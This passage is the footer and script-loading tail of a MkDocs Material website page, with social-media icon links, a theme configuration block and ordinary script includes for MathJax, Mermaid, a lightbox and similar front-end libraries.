1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"></path></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://www.linkedin.com/in/chasejhatch/" target="_blank" rel="noopener" title="www.linkedin.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.1.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3M135.4 416H69V202.2h66.5V416zM102.2 96a38.5 38.5 0 1 1 0 77 38.5 38.5 0 1 1 0-77m282.1 320h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9z"></path></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://discord.com/users/298244420195844096" target="_blank" rel="noopener" title="discord.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><!--! Font Awesome Free 7.1.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path d="M492.5 69.8c-.2-.3-.4-.6-.8-.7-38.1-17.5-78.4-30-119.7-37.1-.4-.1-.8 0-1.1.1s-.6.4-.8.8c-5.5 9.9-10.5 20.2-14.9 30.6-44.6-6.8-89.9-6.8-134.4 0-4.5-10.5-9.5-20.7-15.1-30.6-.2-.3-.5-.6-.8-.8s-.7-.2-1.1-.2C162.5 39 122.2 51.5 84.1 69c-.3.1-.6.4-.8.7C7.1 183.5-13.8 294.6-3.6 404.2c0 .3.1.5.2.8s.3.4.5.6c44.4 32.9 94 58 146.8 74.2.4.1.8.1 1.1 0s.7-.4.9-.7c11.3-15.4 21.4-31.8 30-48.8.1-.2.2-.5.2-.8s0-.5-.1-.8-.2-.5-.4-.6-.4-.3-.7-.4c-15.8-6.1-31.2-13.4-45.9-21.9-.3-.2-.5-.4-.7-.6s-.3-.6-.3-.9 0-.6.2-.9.3-.5.6-.7c3.1-2.3 6.2-4.7 9.1-7.1.3-.2.6-.4.9-.4s.7 0 1 .1c96.2 43.9 200.4 43.9 295.5 0 .3-.1.7-.2 1-.2s.7.2.9.4c2.9 2.4 6 4.9 9.1 7.2.2.2.4.4.6.7s.2.6.2.9-.1.6-.3.9-.4.5-.6.6c-14.7 8.6-30 15.9-45.9 21.8-.2.1-.5.2-.7.4s-.3.4-.4.7-.1.5-.1.8.1.5.2.8c8.8 17 18.8 33.3 30 48.8.2.3.6.6.9.7s.8.1 1.1 0c52.9-16.2 102.6-41.3 147.1-74.2.2-.2.4-.4.5-.6s.2-.5.2-.8c12.3-126.8-20.5-236.9-86.9-334.5zm-302 267.7c-29 0-52.8-26.6-52.8-59.2s23.4-59.2 52.8-59.2c29.7 0 53.3 26.8 52.8 59.2 0 32.7-23.4 59.2-52.8 59.2m195.4 0c-29 0-52.8-26.6-52.8-59.2s23.4-59.2 52.8-59.2c29.7 0 53.3 26.8 52.8 59.2 0 32.7-23.2 59.2-52.8 59.2"></path></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
      <div class="md-progress" data-md-component="progress" role="progressbar"></div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "..", "features": ["navigation.instant", "navigation.instant.progress", "navigation.tabs", "navigation.tabs.sticky", "navigation.expand", "navigation.path", "navigation.prune", "navigation.indexes", "toc.follow", "toc.integrate", "navigation.top", "header.autohide", "search.highlight", "search.share"], "search": "../assets/javascripts/workers/search.7a47a382.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../assets/javascripts/bundle.e71a0d61.min.js"></script>
      
        <script src="../javascripts/mathjax.js"></script>
      
        <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
      
        <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
      
        <script src="https://unpkg.com/mermaid/dist/mermaid.min.js"></script>
      
        <script src="../javascripts/app.js"></script>
      
        <script src="../js/asciinema-player.min.js"></script>
      
        <script src="../assets/javascripts/panzoom.min.js"></script>
      
        <script src="../assets/javascripts/zoompan.js"></script>
      
    
  
<script id="init-glightbox">const lightbox = GLightbox({"touchNavigation": false, "loop": false, "zoomable": true, "draggable": true, "openEffect": "zoom", "closeEffect": "zoom", "slideEffect": "slide"});
document$.subscribe(()=>{ lightbox.reload(); });
</script></body></html>